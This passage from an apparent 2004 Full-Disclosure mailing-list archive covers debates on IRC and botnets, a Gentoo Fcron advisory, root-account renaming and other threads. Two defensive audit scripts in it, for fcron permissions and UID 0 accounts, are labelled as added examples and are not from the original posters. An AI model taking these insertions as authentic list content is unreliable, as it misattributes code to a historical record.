reasoning.  It is a similar reasoning that leads to the slippery slope
toward censorship.

tim



Re: [Full-Disclosure] Why is IRC still around?

2004-11-19 Thread Gregory Gilliss
One alternative - silc. http://www.silcnet.org/

G

On or about 2004.11.19 12:40:26 +, Danny ([EMAIL PROTECTED]) said:

 Well, it sure does help the anti-virus (anti-malware) and security
 consulting business, but besides that... is it not safe to say that:
 
 1) A hell of a lot of viruses/worms/trojans use IRC to wreck further havoc?
 2) A considerable amount of script kiddies originate and grow through IRC?
 3) A wee bit of software piracy occurs?
 4) That many organized DoS attacks through PC zombies are initiated through 
 IRC?
 5) The anonymity of the whole thing helps to foster all the illegal
 and malicious activity that occurs?
 The list goes on and on...
 
 Sorry to offend those that use IRC legitimately (LOL - find something
 else to chat with your buddies), but why the hell are we not pushing
 to sunset IRC?
 
 What would IT be like today without IRC (or the like)? Am I narrow
 minded to say that it would be a much safer place?
 
 ...D
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.netsys.com/full-disclosure-charter.html

-- 
Gregory A. Gilliss, CISSP  E-mail: [EMAIL PROTECTED]
Computer Security WWW: http://www.gilliss.com/greg/
PGP Key fingerprint 2F 0B 70 AE 5F 8E 71 7A 2D 86 52 BA B7 83 D9 B4 14 0E 8C A3



Re: [Full-Disclosure] Why is IRC still around?

2004-11-19 Thread Danny
On Fri, 19 Nov 2004 14:47:36 -0600, Bowes, Ronald (EST)
[EMAIL PROTECTED] wrote:
 How exactly do you propose to accomplish this?  IRC is an open protocol and
 there are many open clients and open servers which can run on any port, and
 run encrypted with SSL.
 
 So do you intend to scan every computer on the Internet on port 6667, and
 shut down every server found running, then move on to random ports that
 zombies probably use, and start attacking sites that provide open source
 clients that use an open protocol?
 
 Your suggestion makes no sense, and it's something that's impossible to
 implement.  Why not just make knives illegal?  I mean, they're frequently
 used as a weapon, right?

Yah, you are right. I just needed to rant when I see all these
trojans written to call home (to an IRC channel) and DoS attacks
coordinated via IRC to control unpatched anti-virus-less Windows PC
zombies.

Next topic...

...D



Re: [Full-Disclosure] University Researchers Challenge Bush Win InFlorida

2004-11-19 Thread Bart . Lansing


Paul Schmehl wrote on 11/19/2004 11:07:47 AM:

 --On Friday, November 19, 2004 12:12:10 AM + Jason Coombs 
 [EMAIL PROTECTED] wrote:
  http://www.computerworld.com/governmenttopics/government/policy/story/0,1
  0801,97614,00.html?nas=PM-97614
 
 I wouldn't trust anything coming out of Bezerkley without confirmation
from 
 competent researchers elsewhere. Furthermore, their more esteemed

 colleagues at CalTech already disagree with them.
 
 http://www.vote.caltech.edu/Reports/Florida_discrepancy3.pdf
 
 Even *if* they are correct (which is at least debatable) the 130,000
vote 
 discrepancy they argue for won't overcome Bush's lead of 380,000,
so this 
 is, at best, an academic exercise.

Paul, do you really feel that as long as the (potentially)
fraudulent votes did not change the outcome (as far as we know...knowing
absolutely nothing for certain at this point) it's perfectly ok that a
method for fixing the e-votes exists and is in use...hypothetically? I'm
just trying to understand where you are coming from on this...does it only
stop becoming an academic exercise if the shoe is on the other foot?





[Full-Disclosure] [ GLSA 200411-27 ] Fcron: Multiple vulnerabilities

2004-11-19 Thread lewk
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200411-27
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Fcron: Multiple vulnerabilities
  Date: November 18, 2004
  Bugs: #71311
ID: 200411-27

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities in Fcron can allow a local user to potentially
cause a Denial of Service.

Background
==

Fcron is a command scheduler with extended capabilities over cron and
anacron.

Affected packages
=

---
 Package /  Vulnerable  /   Unaffected
---
  1  sys-apps/fcron  < 2.9.5   *>= 2.0.2
                               >= 2.9.5.1

Description
===

Due to design errors in the fcronsighup program, Fcron may allow a
local user to bypass access restrictions (CAN-2004-1031), view the
contents of root owned files (CAN-2004-1030), remove arbitrary files or
create empty files (CAN-2004-1032), and send a SIGHUP to any process. A
vulnerability also exists in fcrontab which may allow local users to
view the contents of fcron.allow and fcron.deny (CAN-2004-1033).

Impact
==

A local attacker could exploit these vulnerabilities to perform a
Denial of Service on the system running Fcron.

Workaround
==

Make sure the fcronsighup and fcrontab binaries are only executable by
trusted users.

Resolution
==

All Fcron users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=sys-apps/fcron-2.0.2"

References
==

  [ 1 ] CAN-2004-1030
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1030
  [ 2 ] CAN-2004-1031
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1031
  [ 3 ] CAN-2004-1032
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1032
  [ 4 ] CAN-2004-1033
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1033

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200411-27.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0
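The Workaround section above asks that the fcronsighup and fcrontab binaries be executable only by trusted users. The following audit script is an added example, not part of the GLSA or of Fcron itself: it reports whether each binary is still world-executable (and whether it carries the setuid bit, since fcronsighup is the program the advisory's access-bypass issues live in), assuming the binaries are installed under /usr/bin and using ls(1) output so it runs on any POSIX sh.

```shell
#!/bin/sh
# Added example (not from the GLSA): audit the execute permissions of the
# two Fcron helper binaries named in the advisory's workaround.
# Assumed install directory: /usr/bin (override with the first argument).

# mode_string PATH -> prints the 10-character permission field of ls -ld,
# e.g. "-rwsr-xr-x" (setuid, world-executable) or "-rwxr-x---".
mode_string() {
    ls -ld "$1" | cut -c1-10
}

# world_exec_allowed PATH -> exit 0 if "other" has the execute bit set
# (the field's 10th character is 'x', or 't' when sticky+exec).
world_exec_allowed() {
    case "$(mode_string "$1")" in
        ?????????[xt]) return 0 ;;
        *)             return 1 ;;
    esac
}

# is_setuid PATH -> exit 0 if the setuid bit is set (4th character 's'/'S').
is_setuid() {
    case "$(mode_string "$1")" in
        ???[sS]??????) return 0 ;;
        *)             return 1 ;;
    esac
}

# audit_fcron_binaries [DIR] -> prints one status line per binary and
# returns the number of binaries that are still world-executable
# (0 means the workaround is in place for everything that is installed).
audit_fcron_binaries() {
    dir=${1:-/usr/bin}
    bad=0
    for name in fcronsighup fcrontab; do
        f="$dir/$name"
        if [ ! -e "$f" ]; then
            echo "$f: not installed"
            continue
        fi
        flags=""
        is_setuid "$f" && flags=" setuid"
        if world_exec_allowed "$f"; then
            bad=$((bad + 1))
            echo "$f: world-executable$flags (restrict with: chmod o-x $f)"
        else
            echo "$f: restricted$flags"
        fi
    done
    return "$bad"
}

# Stand-alone use: sh fcron_perm_audit.sh audit [DIR]
case "${1:-}" in
    audit) audit_fcron_binaries "${2:-/usr/bin}" ;;
esac
```

Restricting the execute bit is only a stopgap for local users who are not in the owning group; the Resolution section's upgrade is the actual fix.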



Re: [Full-Disclosure] Re: Airport x-ray software creating images of phantom weapons?

2004-11-19 Thread Adam Jacob Muller
Rot 13 may not be strong but rot12 is. I once posted a string that I 
only rotated 12 chars to my blog and it took a month before anyone 
figured it out. That probably says more about the IQ of the people 
reading my blog than the security of rot13.

Adam
Where is it written in the Constitution, in what article or section is 
it contained, that you may take children from their parents and parents 
from their children, and compel them to fight the battles of any war in 
which the folly and wickedness of the government may engage itself? 
Under what concealment has this power lain hidden, which now for the 
first time comes forth, with a tremendous and baleful aspect, to 
trample down and destroy the dearest right of personal liberty? Who 
will show me any Constitutional injunction which makes it the duty of 
the American people to surrender everything valuable in life, and even 
life, itself, whenever the purposes of an ambitious and mischievous 
government may require it? . . . A free government with an uncontrolled 
power of military conscription is the most ridiculous and abominable 
contradiction and nonsense that ever entered into the heads of men.
-Daniel Webster

On Nov 19, 2004, at 3:30 PM, [EMAIL PROTECTED] wrote:
On Thu, 18 Nov 2004 10:46:50 GMT, Joel Merrick said:
Maybe it'll get leaked on the net and we'll find out they use a hard
coded DES key that I could crack with my casio watch ;)
No, ROT13 is way leet strong crypto as long as nobody knows it, as
Skylarov found out... ;)


Re: [Full-Disclosure] Why is IRC still around?

2004-11-19 Thread Eric Paynter
On Fri, November 19, 2004 9:40 am, Danny said:
 2) A considerable amount of script kiddies originate and grow through
 IRC?
 3) A wee bit of software piracy occurs?
 4) That many organized DoS attacks through PC zombies are initiated
 through IRC?
 5) The anonymity of the whole thing helps to foster all the illegal
 and malicious activity that occurs?

I think you answered the question. It is still around because it is useful
for some. It's not like the ability to host an Internet server is
regulated. Anybody can create one.

-Eric

--
arctic bears - email and dns services
http://www.arcticbears.com



Re: [Full-Disclosure] Why is IRC still around?

2004-11-19 Thread Danny
On Fri, 19 Nov 2004 15:54:54 -0500, Tim
[EMAIL PROTECTED] wrote:
  1) A hell of a lot of viruses/worms/trojans use IRC to wreck further havoc?
 
 Isn't email the primary spreading mechanism of viruses?

My mistake; I was referring to the discussion, collaboration, and
creation, not the spread.

 should we sunset email?

Some say we should, but I am not one of those. My point was to get rid
of the most well established tool (and easiest to use) for these types
of activities.

  2) A considerable amount of script kiddies originate and grow through IRC?
 
 And if there were no IRC, they would use AIM, or MSN messenger, or more
 likely, jabber.  What's the difference?  It is popular amongst hackers
 (of any level of morality) because it is open.

What's the difference? IRC is so well established for the type of
activity I am referring to.

  3) A wee bit of software piracy occurs?
 
 And it doesn't on any other protocol?  People who want to pirate will do
 it using whatever tools are available.  Take away one, and others will
 be used.

I'll leave the piracy battle for someone else - I just mentioned it as
a part of the problem.

  4) That many organized DoS attacks through PC zombies are initiated through 
  IRC?
 
 It wouldn't be any harder to pull this off via netcat.  If it is the
 anonymity an attacker wants, they just use one of the zombies as the
 server.

Sure netcat is an alternative, but which one is easier to use?

  5) The anonymity of the whole thing helps to foster all the illegal
  and malicious activity that occurs?
 
 How is it any more anonymous than email, or web, or any other
 unauthenticated protocol?

My point was to get rid of the most well established tool (and easiest
to use) for these types of activities. You obviously can't get rid of
them all.

 Please don't tell me you trust the From: header in your email, or believe 
 that all of the IPs
 in your weblogs are directly tied to a person's home PC.

And all these years frig!
 
  The list goes on and on...
 
 Yes, but every one of those arguments is horribly flawed.  I am not sure
 if you are just being a troll or what.

I thought I would throw out the idea. If you want to call me a troll,
then so be it, but don't get your panties in a knot over the whole
thing

  Sorry to offend those that use IRC legitimately (LOL - find something
  else to chat with your buddies), but why the hell are we not pushing
  to sunset IRC?
 
  Am I narrow minded to say that it would be a much safer place?
 
 yes, you are being narrow-minded.

Fair enough.

...D



Re: [Full-Disclosure] IE is just as safe as FireFox

2004-11-19 Thread john morris
Dear Joe, 

So many out there use MS OS doesn't make it the best just as so many
people go to McDonalds doesn't mean they make the best food


-- 
(FROM LINKS TO LINKS WE ARE ALL LINKED)

cheers.

morris



Re: [Full-Disclosure] WiFi question

2004-11-19 Thread Esmond
On 10:50, Fri 19 Nov 04, Paul Schmehl wrote:
 --On Thursday, November 18, 2004 09:32:27 AM -0600 Paul Schmehl
 [EMAIL PROTECTED] wrote:

 --On Wednesday, November 17, 2004 12:41:44 PM -0500 Lachniet, Mark
 [EMAIL PROTECTED] wrote:
 

 I find it hard to believe that this is possible.  2.4Ghz is the 9th
 harmonic.  By the time you get to the 4th harmonic of a signal, even in
 very very noisy radiators, the strength of the harmonic component of the
 signal is extremely minute.  And, given the fact that one of those sensors
 (which most likely does *not* truly operate in the 240MHz portion of the
 spectrum) will have a very low output (Part 15 device), the 10th harmonic
 of that signal will be undetectable as it will be at or below the level of
 background noise.

Despite your disbelief, this is basic physics and a core component of
musical amplification. It may not be solely due to the device. There may
be building cavities amplifying the signal. This is a radio wave we're
talking about after all.

Sufficient Harmonic Oscillation can result in a boosted signal or
Resonance:

http://www.sasked.gov.sk.ca/docs/physics/u5c42phy.html

 Finally, if a device managed to get past all of the improbabilities above,
 the chances of it *accidentally* creating a signal that looked like an
 802.11 beacon packet, complete with preamble, header, etc is so off the
 charts as to be laughable.

It's not an accident. Cheap equipment = low quality control = no
suppression and filtering.

 One other thing...  If that device truly was operating at 240MHz, then the
 first harmonic would be 480MHz.  I'm pretty sure that frequency lies in the
 public service bands (ie fire/police).  If not, its very close.  Given that
 and the fact that the first harmonic would be much stronger than the 9th
 harmonic, I'm pretty sure someone in those bands would have complained
 loudly to the FCC as they don't take interference issues in those bands
 lightly.

Eh, not only does this happen, here's a recent story on one instance:

http://www.technewsworld.com/story/37435.html

 Paul Schmehl ([EMAIL PROTECTED])
 Adjunct Information Security Officer
 The University of Texas at Dallas
 AVIEN Founding Member
 http://www.utdallas.edu

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.netsys.com/full-disclosure-charter.html

--
Esmond Kane
Sys Admin
HUAM DIT



RE: [Full-Disclosure] Why is IRC still around?

2004-11-19 Thread Darren Wolfe
I have never replied to anything on this list (I read it to keep up to date
on vulnerabilities, but I'm not really qualified to contribute anything) but
this particular message has piqued my interest.  

1. Agreed, by using flaws in IE they then go on to subvert mirc into
spamming people.
2. They do.
3. A tremendous amount :)
4. This is only because IRC provides the perfect medium in which to control
those zombies (a single message from one person is immediately sent to
everyone in the channel at the same time). If a better medium was available,
they'd use that.

IRC is as close to a real time group conversation as you can get that
doesn't use closed protocols.  It's fast, simple and used by an enormous
number of people - particularly those who play online games, and for open
source projects (#gentoo on freenode regularly has over 900 people in it).

In answer to your final question - IRC is very useful for quick
conversations in real time with groups of people. Sure there are other
things - usenet, web based forums, email based mailing lists, IM networks
etc but none have that group feeling as much as IRC.

Its problem is twofold - firstly, mirc (the most popular client) has a
number of flaws that make it easy to steal people's auth passwords. But
these are not automated! The user must be tricked into typing some commands
to set the exploit in motion.
This is also the second problem - a link may be mentioned in a channel and
people will click on it - from there, if your browser is vulnerable, you can
be hit by any number of trojans.  There was a winamp trojan going about a
few months ago (which I reported and is now fixed - go me :D ) which
involved clicking a link in irc that opened winamp through a file
association that exploited a security flaw that installed a script for mirc
that spammed the same link to everyone in the channel.

Like any other medium, it is a combination of a lack of knowledge by the
users and exploits/vulnerabilities in software; the only difference is that
on IRC it tends to spread quickly because of its real time nature.
So in conclusion, no, IRC should not be killed off, mirc's scripting
vulnerabilities should be closed in some way, and vulnerabilities in other
software should continue to be discovered and fixed.

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Danny
Sent: 19 November 2004 17:40
To: Mailing List - Full-Disclosure
Subject: [Full-Disclosure] Why is IRC still around?

Well, it sure does help the anti-virus (anti-malware) and security
consulting business, but besides that... is it not safe to say that:

1) A hell of a lot of viruses/worms/trojans use IRC to wreak further havoc?
2) A considerable amount of script kiddies originate and grow through IRC?
3) A wee bit of software piracy occurs?
4) That many organized DoS attacks through PC zombies are initiated through
IRC?
5) The anonymity of the whole thing helps to foster all the illegal and
malicious activity that occurs?
The list goes on and on...

Sorry to offend those that use IRC legitimately (LOL - find something else
to chat with your buddies), but why the hell are we not pushing to sunset
IRC?

What would IT be like today without IRC (or the like)? Am I narrow minded to
say that it would be a much safer place?

...D



Re: [Full-Disclosure] Why is IRC still around?

2004-11-19 Thread Robert Wesley McGrew
On Fri, 19 Nov 2004 12:40:26 -0500, Danny [EMAIL PROTECTED] wrote:
 Well, it sure does help the anti-virus (anti-malware) and security
 consulting business, but besides that... is it not safe to say that:
 
 1) A hell of a lot of viruses/worms/trojans use IRC to wreak further havoc?

If you mean botnets that gather on IRC as a control channel, I believe
IRC is used because it's a relatively simple protocol to code to. It'd
be just as easy, arguably easier, to use some other protocol. Check
out steele's writeup on a web based botnet of proxies:

http://lowkeysoft.com/proxy/

The screenshots at least will give you some idea of how effective a
web control channel can be.  Do you plan on coming back in two or
three years to post Why is HTTP still around?

 2) A considerable amount of script kiddies originate and grow through IRC?

A lot of us originated and grew through IRC, and I'll give it to you
that it's a good playground for the kiddies to play in, but I don't
really see how any other communication channel would have prevented
this.  Most of the kids of today and tomorrow are probably coming up
through web forums and such anyways.  2 years: Why is phpBB still
around?

 3) A wee bit of software piracy occurs?

I'll hand this one to you too, but the actual transfers go from client
to client, not through the IRC servers.  Surely this isn't any more
insidious than meeting up in some other chat protocol or web site to
transfer files from one person to another.  Compare to bittorrent
where public websites can post a torrent, and hundreds of people who
wouldn't have a clue as to how to join an IRC channel can distribute a
file with surprising efficiency, both downloading and uploading
segments to each other in an automated way.

 4) That many organized DoS attacks through PC zombies are initiated through 
 IRC?

See 1)

 5) The anonymity of the whole thing helps to foster all the illegal
 and malicious activity that occurs?

If you're not connecting through a proxy/3rd party system in some way,
then your anonymity on IRC is probably not as high as you might think.

 The list goes on and on...
 
 Sorry to offend those that use IRC legitimately (LOL - find something
 else to chat with your buddies), but why the hell are we not pushing
 to sunset IRC?

Because (assuming that you could somehow stop people from running IRC
servers, which I would love to hear how) in two years we'd have to
sunset another protocol that people used as an anonymous hangout/warez
trading/malware control channel.

 What would IT be like today without IRC (or the like)? Am I narrow
 minded to say that it would be a much safer place?

I don't believe it'd be much safer.  The same things that make IRC a
nice protocol for script kiddies are the same things that make it a
nice simple tool for communication for legitimate purposes.  I believe
that anything that would prove to be as nice of a chat setup for
legitimate users, would be just as convenient for illegitimate
purposes.

-- 
Robert Wesley McGrew
http://cse.msstate.edu/~rwm8/



RE: [Full-Disclosure] Why is IRC still around?

2004-11-19 Thread Bowes, Ronald (EST)
If you DID manage to take away IRC, they'd find another way to manage their
bots.  Perhaps they'd all migrate their DDoS nets to Battle.net. /jokes


Ron Bowes
Information Protection Centre
Government Of Manitoba

-Original Message-
From: Danny [mailto:[EMAIL PROTECTED] 
Sent: Friday, November 19, 2004 2:53 PM
To: Bowes, Ronald (EST)
Cc: Mailing List - Full-Disclosure
Subject: Re: [Full-Disclosure] Why is IRC still around?

On Fri, 19 Nov 2004 14:47:36 -0600, Bowes, Ronald (EST)
[EMAIL PROTECTED] wrote:
 How exactly do you propose to accomplish this?  IRC is an open protocol
and
 there are many open clients and open servers which can run on any port,
and
 run encrypted with SSL.
 
 So do you intend to scan every computer on the Internet on port 6667, and
 shut down every server found running, then move on to random ports that
 zombies probably use, and start attacking sites that provide open source
 clients that use an open protocol?
 
 Your suggestion makes no sense, and it's something that's impossible to
 implement.  Why not just make knives illegal?  I mean, they're frequently
 used as a weapon, right?

Yah, you are right. I just needed to rant when I see all these
trojans written to call home (to an IRC channel) and DoS attacks
coordinated via IRC to control unpatched anti-virus-less Windows PC
zombies.

Next topic...

...D



Re: [Full-Disclosure] Why is IRC still around?

2004-11-19 Thread Micheal Espinola Jr
An excellent question.


On Fri, 19 Nov 2004 12:40:26 -0500, Danny [EMAIL PROTECTED] wrote:
 Well, it sure does help the anti-virus (anti-malware) and security
 consulting business, but besides that... is it not safe to say that:
 
 1) A hell of a lot of viruses/worms/trojans use IRC to wreak further havoc?
 2) A considerable amount of script kiddies originate and grow through IRC?
 3) A wee bit of software piracy occurs?
 4) That many organized DoS attacks through PC zombies are initiated through 
 IRC?
 5) The anonymity of the whole thing helps to foster all the illegal
 and malicious activity that occurs?
 The list goes on and on...
 
 Sorry to offend those that use IRC legitimately (LOL - find something
 else to chat with your buddies), but why the hell are we not pushing
 to sunset IRC?
 
 What would IT be like today without IRC (or the like)? Am I narrow
 minded to say that it would be a much safer place?
 
 ...D
 


-- 
ME2
http://www.santeriasys.net/rss.php



Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox

2004-11-19 Thread bkfsec
Andrew Farmer wrote:
In fact, I'm not so sure it's even a component of Nautilus. Is this a 
recent change?

Nope - it depends on how you install Nautilus, though.  I know that on a 
number of RH systems I've had to configure lately, Mozilla is a 
dependency (not firefox) because Nautilus seems to use it. (at least in 
RH - my recollection of whether it's available as a dependency in the 
Nautilus source code is hazy, it's been a long time since I've compiled 
GNOME and it will most likely be an even longer time before I do it again.)

-Barry


Re: [Full-Disclosure] Why is IRC still around?

2004-11-19 Thread n3td3v
I wish it was possible, but it just wouldn't work. The hackers would
move onto the next best chat system, whatever that may be at the time.

For it ever to work, you would need to ban all chat communications and
peer 2 peer on the internet, and that's unlikely to happen, and would
be hard to police.

In the meantime what would you do with the billions of legitimate
users of IRC, IM and P2P?

Tell them to go away as well? I'm anti-malicious hackers, but this
idea just would never work.

Thanks, n3td3v



Re: [Full-Disclosure] Why is IRC still around?

2004-11-19 Thread Tim
 1) A hell of a lot of viruses/worms/trojans use IRC to wreak further havoc?

Isn't email the primary spreading mechanism of viruses?  should we
sunset email?

 2) A considerable amount of script kiddies originate and grow through IRC?

And if there were no IRC, they would use AIM, or MSN messenger, or more
likely, jabber.  What's the difference?  It is popular amongst hackers
(of any level of morality) because it is open.

 3) A wee bit of software piracy occurs?

And it doesn't on any other protocol?  People who want to pirate will do
it using whatever tools are available.  Take away one, and others will
be used.

 4) That many organized DoS attacks through PC zombies are initiated through 
 IRC?

It wouldn't be any harder to pull this off via netcat.  If it is the
anonymity an attacker wants, they just use one of the zombies as the
server.

 5) The anonymity of the whole thing helps to foster all the illegal
 and malicious activity that occurs?

How is it any more anonymous than email, or web, or any other
unauthenticated protocol?  Please don't tell me you trust the From:
header in your email, or believe that all of the IPs in your weblogs are
directly tied to a person's home PC.

 The list goes on and on...

Yes, but every one of those arguments is horribly flawed.  I am not sure
if you are just being a troll or what.

 Sorry to offend those that use IRC legitimately (LOL - find something
 else to chat with your buddies), but why the hell are we not pushing
 to sunset IRC?
 
 Am I narrow minded to say that it would be a much safer place?

yes, you are being narrow-minded.

tim



Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox

2004-11-19 Thread Frank Knobbe
On Fri, 2004-11-19 at 20:40, Jeremy Davis wrote:
 Are you able to change root's name in nix? Why not if the answer is no?
 (Things would break right? UID 0?) Knowing the account name is
 two-thirds of the battle.
 In windows it's fairly easy to change the admin name.
 Not a professional here just curious...

You can change the name of the root account in Unix, just like the
Administrator account in Windows.

But you cannot change the UID of the root account (0) just like you
cannot change the SID of the Administrator account (500).

I argue that changing the account name in Unix does as little or much as
changing the account name in Windows. If you have access to the system
you can easily find the account name of the UID 0 account, just as
easily as you can figure out the name of the SID x-500 account.

The difference is that you can change and hard code that change in the
source of Unix (at least with those that you have the source for, Linux,
*BSD, whatever). Can you do that with Windows?

Regards,
Frank
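Frank's point that the superuser's name is recoverable from UID 0 no matter what it is called can be turned into a routine hardening check. The following is an added example for this thread, not code posted by anyone on the list: it parses passwd(5) text, lists every account mapped to UID 0, and flags any that are not on an allow-list. The passwd content is constructed for the demonstration, and the account names "adm" and "toor" in it are hypothetical.

```python
"""Find the UID 0 account(s) in a passwd database.

Added example for this thread, not code from any poster. Renaming root
hides nothing from anyone who can read /etc/passwd, because the name is
recoverable from the UID; the same lookup doubles as a check for
unexpected UID 0 accounts. The passwd text below is constructed, and the
names "adm" and "toor" are hypothetical.
"""
from __future__ import annotations

from dataclasses import dataclass

try:
    import pwd  # POSIX only; used for the live-system variant below
except ImportError:  # e.g. Windows
    pwd = None

# Constructed sample database: the superuser has been renamed to "adm",
# and a second UID 0 account ("toor") has been added.
SAMPLE_PASSWD = """\
adm:x:0:0:Renamed superuser:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
toor:x:0:0:Spare superuser:/root:/bin/sh
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
"""


@dataclass(frozen=True)
class PasswdEntry:
    name: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text: str) -> list[PasswdEntry]:
    """Parse passwd(5) lines (name:passwd:uid:gid:gecos:home:shell)."""
    entries: list[PasswdEntry] = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, _password, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, int(uid), int(gid), gecos, home, shell))
    return entries


def accounts_with_uid(entries: list[PasswdEntry], uid: int) -> list[str]:
    """Names of all accounts mapped to the given UID, in file order."""
    return [e.name for e in entries if e.uid == uid]


def audit_uid0(entries: list[PasswdEntry],
               allowed: tuple[str, ...] = ("root",)) -> list[str]:
    """UID 0 accounts whose name is not on the allow-list.

    On a host where the superuser was deliberately renamed, pass the new
    name in `allowed`; anything left over is an extra superuser to explain.
    """
    return [name for name in accounts_with_uid(entries, 0) if name not in allowed]


def live_uid0_accounts() -> list[str]:
    """Same lookup against the running system's account database."""
    if pwd is None:
        raise RuntimeError("pwd module unavailable on this platform")
    return sorted(e.pw_name for e in pwd.getpwall() if e.pw_uid == 0)


if __name__ == "__main__":
    entries = parse_passwd(SAMPLE_PASSWD)
    print("UID 0 accounts in sample:", accounts_with_uid(entries, 0))
    print("unexpected UID 0 accounts:", audit_uid0(entries, allowed=("adm",)))
```

Run against the constructed sample, the audit reports both "adm" and "toor" with the default allow-list, and only "toor" once the deliberate rename is allowed; the surviving finding is the one worth investigating. The Windows side of Frank's comparison is the same kind of check on the account whose SID ends in 500, so in both worlds the rename is at most a speed bump and the real control is keeping the set of superuser accounts known and small.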





RE: [Full-Disclosure] IE is just as safe as FireFox

2004-11-19 Thread joe
I 100% agree with you. I never said MS was the best or even that they should
always be used. In fact in many occasions I have pushed for alternative
answers for companies who were customers. 

Being the best or even better doesn't mean you will become the most popular
either. Look at Apple. Look at BetaMax. Look at lots of things. 

To fully be honest though, MS isn't McDonalds. MS in the food world would be
McDonald's, Burger King, Wendy's, Hardees, Taco Bell, Red Robin, Olive
Garden, Domino's, Pizza Hut, Little Caesars, Jack in the Box, and every
other food chain you know of and also every major diner and eatery you know
of. The things that weren't Microsoft would be the little corner delis,
places that are called names like Michael's kitchen or Mohsin's Falafel
stand. It is a simple fact of life that MS has enough overall market share
to make the penetration of all other OSes look like rounding errors. MS
appeals to the masses, the others appeal to niche areas. Look at the
numbers. This means that we have to do serious work at getting the stuff
corrected. Whining and complaining that they aren't the best or that they
suck or that billg is hellspawn does nothing to help anyone.

Basically, just because MS is on top, doesn't mean we shouldn't work to push
them to get better or give up and say, OS * does it much better, forget
them. But at the same time, we have to be realistic about the goals and what
needs to be done. Someone saying that they won't use IE and any web site
that requires it is stupid because they aren't following web standards is
rather shortsighted and having trouble grasping reality. Someone saying
that MS needs to rip all of that out immediately is also having reality
issues. I do think it is right and feasible for MS to give people a choice
as to whether they want IE bits on a machine or not at all (this includes
all of the bits). If I run an MS box and html content doesn't work in my MS
mail reader, I am not going to be overly upset. If I was, then say I install
that component. The realistic gripe is that we don't have the option to not
load IE at the moment. Trying to change that is a realistic goal, definitely
on servers for instance; users aren't visiting web sites from servers or at
least probably shouldn't be.

Microsoft can become secure and they are working towards it. It is just
going to take a good amount of work to do so. :o)


   joe


--
Pro-Choice
Let me choose if I even want a browser loaded thanks!



-Original Message-
From: john morris [mailto:[EMAIL PROTECTED] 
Sent: Friday, November 19, 2004 4:32 PM
To: joe
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] IE is just as safe as FireFox

Dear Joe, 

So many out there use MS OS doesn't make it the best, just as so many people
go to McDonalds doesn't mean they make the best food.


--
(FROM LINKS TO LINKS WE ARE ALL LINKED)

cheers.

morris



Re: [Full-Disclosure] SecurityForest - Public Release #1

2004-11-19 Thread loni
Hi Gregory,

As to my knowledge, the internet is a global network and all the information
contained within is openly available. I also don't see the "advantage" you
have mentioned - are we at competition with one another?

Secondly, thanks for the compliment on the "idea".

As mentioned in SecurityForest's Mission - "for the community - by the
community". I hope that the security community will see an advantage in
contributing as without it, the Forest will not grow and therefore the
community will not gain this medium of shared knowledge.

Best Regards,
Loni
[EMAIL PROTECTED]
www.securityforest.com


Date: Fri, 19 Nov 2004 08:27:27 -0800
From: Gregory Gilliss [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] SecurityForest - Public Release #1
Reply-To: Gregory Gilliss [EMAIL PROTECTED]

Yeah, I'd like for my country to accumulate all the available computer
security knowledge too...one heck of a competitive advantage to have.

Registrant:
   Alon Swartz
   Har Sinai St
   Raanana, NA 43307
   Israel

   Registered through: GoDaddy.com
   Domain Name: SECURITYFOREST.COM
      Created on: 14-Sep-04
      Expires on: 14-Sep-05
      Last Updated on: 14-Sep-04

   Administrative Contact:
      Swartz, Alon  [EMAIL PROTECTED]
      Har Sinai St
      Raanana, NA 43307
      Israel
      97745657      Fax --

   Technical Contact:
      Swartz, Alon  [EMAIL PROTECTED]
      Har Sinai St
      Raanana, NA 43307
      Israel
      97745657      Fax --

   Domain servers in listed order:
      NS1.EVERYDNS.NET
      NS2.EVERYDNS.NET

Pity the US is so busy scaring the population that they have no time to
come up with ideas like this...

-- Greg

On or about 2004.11.19 12:41:29 +, [EMAIL PROTECTED] ([EMAIL PROTECTED]) said:

 Community Website: http://www.securityforest.com
 Community IRC channel: irc://irc.unixgods.net:/securityforest

 Table of contents
 =================
 Summary
 The Open Source Idea
 Trees in the Forest
   ExploitTree
   ToolTree
   TutorialTree
   LinkTree
 GreenHouse
 Thanks

 Summary
 =======
 SecurityForest.com is a collaboratively edited Forest consisting of Trees
 which anyone can contribute to. SecurityForest's trees are specific
